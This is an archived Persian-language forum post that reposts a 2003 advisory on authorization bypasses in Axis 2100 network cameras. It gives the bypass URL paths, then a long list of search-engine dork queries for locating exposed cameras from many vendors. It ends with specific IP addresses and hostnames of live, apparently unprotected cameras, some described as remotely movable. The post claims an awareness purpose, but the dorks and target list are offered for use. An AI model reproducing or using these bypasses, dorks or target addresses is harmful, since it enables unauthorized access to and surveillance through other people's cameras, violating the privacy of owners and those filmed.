انجمن گروه موج سازان

نسخه‌ی کامل: Authorization Bypass در دوربین های تحت شبکه
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
با سلام

یک حفره کوچیک در دوربین های تحت شبکه Axis 2100 Network Camera  وجود داره

گفتم اینجا قرار بدهم برای اطلاع عمومی

بحث خفنی نیست خیلی موضوع ساده است برای این مطرح کردم اگر جایی دوربین کار میکنید

فکر امنیت هم باشید همین


اکسپلویت
کد:
#######################################################################

Device:           Axis 2100 Network Camera 2.31  - Multiple Vulnerabilities
Application/Server:    Boa/0.92o / Foundry Networks/2.20
Vendors:         http://www.axis.com
Versions:        <= 2.31
Platforms:       Windows
Bug:                 Authorization Bypass, Internal I.P Exposure, Password Encryption Algorithm  Exposure
Risk:                High
Exploitation:   remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bugs
3) The Code

#######################################################################

===============
1) Introduction
===============

The AXIS 2100 Network Camera offers crisp, quality images and streaming video
from anywhere on your network. It lets you keep a close eye on the world around
you, or show your part of it through the Web.

With a built-in high performance Web server, no PC is required. The network camera
can operate as a standalone or be placed wherever there is a LAN or Internet connection,
or an available modem.

#######################################################################

======
2) Bug
======

In order to see any page the server reuires authentification, as it should.
But why to use a standard "HTTP Basic Authorization" that any script kiddie
can Brute Force instead of the java login authentification that the server contains?!

The server is safe against XSS and Directory Transversal, which can help an attacker
retrieve the machines password, but who needs is when you can just
BYPASS THE AUTHORIZATION BY REFFERING THE FOLDER "/admin/".
This is ridiculous that although an attacker can bruteforce, he doesn't have to
because he can just walk right into the system, change anything and even retrieve the password.

Another way to BYPASS THE AUTHORIZATION is by reffering to folders with double "//"
for example:
http://<host>//view/index.shtml

Another less concerning hole in the server is the exposure of the machine's Internal IP
inside one of the demo files, such as /demo/edu640x480jav.shtml.

In addition to all this the password encryption algorithm is exposed in the file /java/users.shtml.

Further directory listing is available for "/java",/pics

#######################################################################

===========
3) The Code
===========

1) Authorization Bypass - http://<host>/admin/
2) Authorization Bypass - http://<host>//view/index.shtml
3) Internal I.P Exposure - http://<host>/demo/edu640x480jav.shtml
4) Password Encryption Algorithm  - http://<host>/java/users.shtml

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."  

برای دارک های هم میتوانید از
کد:
inurl:indexFrame.shtml Axis
inurl:”ViewerFrame?Mode=””
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”
inurl:/home/home
“Kamerainformationen anzeigen”
intitle:”AXIS 2100 Network Camera Axis 2100 Network Camera 2.02″
intitle:”Linksys Web Camera” “ver”
intitle:snc-rz30 inurl:home/
inurl:/view/index.shtml
inurl:”ViewerFrame?Mode=”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”
inurl:CgiStart?page=Single
inurl:indexFrame.shtml?newstyle=Quad
intitle:liveapplet inurl:LvAppl
inurl:/showcam.php?camid
inurl:video.cgi?resolution=
inurl:image?cachebust=
intitle:”Live View / – AXIS”
inurl:view/view.shtml
intext:”MOBOTIX M1″
intext:”Open Menu”
intitle:snc-rz30
inurl:home/
inurl:”MultiCameraFrame?Mode=”
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”ViewerFrame?Mode=”
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu

برای نمونه

http://65.167.91.220/anony/mjpg.cgi
http://24.155.150.53/anony/mjpg.cgi
http://94.102.31.181/anony/mjpg.cgi
http://76.119.10.37/anony/mjpg.cgi
http://sundern-heute.dnsalias.net/control/multiview
http://95.45.245.105:89/control/userimage.html
http://kamera-zamek.jhcomp.cz/axis-cgi/m...on=320x240


این جریان میتونه خطرناک باشه مثلا این را ببینید
http://141.213.21.87/view/view.shtml?id=...jpg&size=1

یا مثلا میتوانید حتی دوربین را حرکت بدهید
http://210.175.242.113/ViewerFrame?Mode=...Language=0
http://61.119.240.67/ViewerFrame?Mode=Motion&Language=0

بعضی ها هم جالبه
http://63.138.232.19/view/view.shtml?id=...jpg&size=1

موفق باشید